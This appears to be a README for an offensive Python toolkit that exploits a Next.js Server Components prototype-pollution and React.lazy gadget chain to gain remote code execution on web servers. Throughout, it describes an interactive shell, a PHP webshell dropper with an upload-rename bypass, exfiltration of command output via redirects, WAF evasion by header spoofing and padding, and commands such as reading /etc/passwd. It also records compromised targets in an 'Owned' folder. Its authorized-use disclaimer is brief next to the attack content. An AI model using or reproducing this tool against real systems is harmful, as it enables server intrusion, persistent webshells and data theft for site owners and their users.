This Python toolkit exploits Next.js React Server Components (RSC) prototype pollution + React.lazy(-1) gadget chain for full RCE access, including interactive god shell, file upload (PHP webshell dropper), and exfiltration via ?out=.
Automated detection & exploitation of vulnerable Next.js apps (e.g., target.com). Drops uid=33(www-data) shell with:
- RCE via
child_process.execSync→/exploit?out=UID - God Shell: Interactive cmds, file read (
read /etc/passwd), uploads - Bypass: Junk KB padding, Unicode, Vercel/WAF tweaks
- Stealth: Base64 encode, multipart RSC POST
- Detect: POST
{\"0\":null}→ 500E{\"digestconfirms RSC handler. - Combos: Test pollution+lazy payloads (junk=0/KB, uni, vercel) →
Location: /exploit?out=id_output - Exploit:
execSync(cmd)→ exfil stdout/stderr via redirect. - Shell: Loop cmds,
upload_txt local.txt remote.php→ write+rename bypass. - WAF: X-FF=127.0.0.1, Origin/Referer evade BitNinja/nginx.
pip3 install aiohttppython3 main.py- Enter target(s):
http://target.comortargets.txt - Mode:
1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]
Piped: echo \"http://target\n4\" | python3 main.py
God Shell Commands:
upload <local.php> <remote/shell.php> # Direct PHP upload
upload_txt <local> <remote/shell.php> # TXT→rename bypass
upload_bin <local> <remote> # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
- Vulnerable:
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt - Screenshots: Banner →
[VULNERABLE]→uid=33(www-data)
aiohttp
pip install aiohttp
For authorized penetration testing & educational purposes only (user confirmed permission under ToS). Unauthorized use illegal/unethical.
Buy me a Coffee:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans